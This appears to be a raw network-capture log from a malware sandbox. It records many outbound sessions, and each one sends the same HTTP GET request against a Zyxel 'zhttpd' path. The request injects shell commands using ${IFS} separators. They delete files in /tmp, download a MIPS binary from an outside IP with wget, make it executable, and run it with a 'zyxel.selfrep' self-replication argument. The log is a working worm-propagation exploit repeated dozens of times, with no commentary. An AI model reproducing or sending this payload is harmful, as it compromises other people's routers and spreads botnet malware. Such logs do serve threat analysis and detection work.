                                          Jan 14, 2024 15:46:25.189918995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6437192.168.2.2359336140.72.17.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189934969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6438192.168.2.2349198117.149.194.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189984083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6439192.168.2.2358440145.76.79.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.189987898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6440192.168.2.234207858.59.64.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190021038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6441192.168.2.233783677.152.104.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190052032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6442192.168.2.2336210166.119.30.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190067053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6443192.168.2.2350668187.73.224.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190103054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6444192.168.2.2357236212.204.205.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190121889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6445192.168.2.2351550221.4.211.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190155983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6446192.168.2.234973843.81.6.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190159082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6447192.168.2.236007240.35.0.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190170050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6448192.168.2.2351098175.64.243.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190201998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6449192.168.2.2353464103.225.31.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190237999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6450192.168.2.2360166184.254.231.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190265894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6451192.168.2.235856674.207.37.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190289974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6452192.168.2.2358896117.27.145.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190289974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6453192.168.2.2349468171.246.23.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190327883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6454192.168.2.2333374177.67.192.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190362930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6455192.168.2.2348980205.183.43.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190407991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6456192.168.2.2340132149.80.243.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190433025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6457192.168.2.2356640138.56.154.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190459013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6458192.168.2.2353374206.160.115.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190490007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6459192.168.2.2348874209.235.26.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190514088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6460192.168.2.2344642203.91.80.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190522909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6461192.168.2.233788693.149.224.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190550089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6462192.168.2.2353940151.103.2.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190582991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6463192.168.2.235555043.228.198.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190601110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6464192.168.2.2357250130.144.203.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190633059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6465192.168.2.2344878192.5.63.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190645933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6466192.168.2.234839269.111.163.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190696001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6467192.168.2.233674232.127.101.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190717936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6468192.168.2.2360152147.88.204.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190741062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6469192.168.2.233742639.19.213.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190747023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6470192.168.2.2338594133.67.107.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190793991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6471192.168.2.2341666213.220.76.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190813065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6472192.168.2.2342250152.179.5.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190850973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6473192.168.2.2348440140.221.65.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190886021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6474192.168.2.2334270152.234.98.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190908909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6475192.168.2.2354874201.94.234.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190938950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6476192.168.2.235180894.173.129.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190968037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6477192.168.2.2339658121.116.127.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.190992117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6478192.168.2.234354245.0.72.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191025972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6479192.168.2.235202285.39.46.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191049099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6480192.168.2.2343444171.194.151.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191061974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6481192.168.2.2357166221.178.42.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191076040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6482192.168.2.2350752123.41.108.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191124916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6483192.168.2.234077881.197.63.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191148996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6484192.168.2.234350290.154.103.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191188097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6485192.168.2.2336588180.202.62.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191234112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6486192.168.2.233741620.28.10.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191236973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6487192.168.2.233548472.112.19.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191292048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6488192.168.2.2353824129.99.160.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191292048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6489192.168.2.2349086126.229.14.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191328049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6490192.168.2.2335100219.158.133.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191365004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6491192.168.2.233287698.147.3.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191411018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6492192.168.2.2346632201.158.98.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191425085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6493192.168.2.234770496.157.69.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191457987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6494192.168.2.2345174102.86.39.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191484928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6495192.168.2.2344572141.194.155.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191521883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6496192.168.2.233557866.173.43.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191534996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6497192.168.2.2337840126.89.224.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191557884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6498192.168.2.2343914193.145.226.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:25.191574097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6499192.168.2.2334104180.178.141.70443
                                          TimestampBytes transferredDirectionData
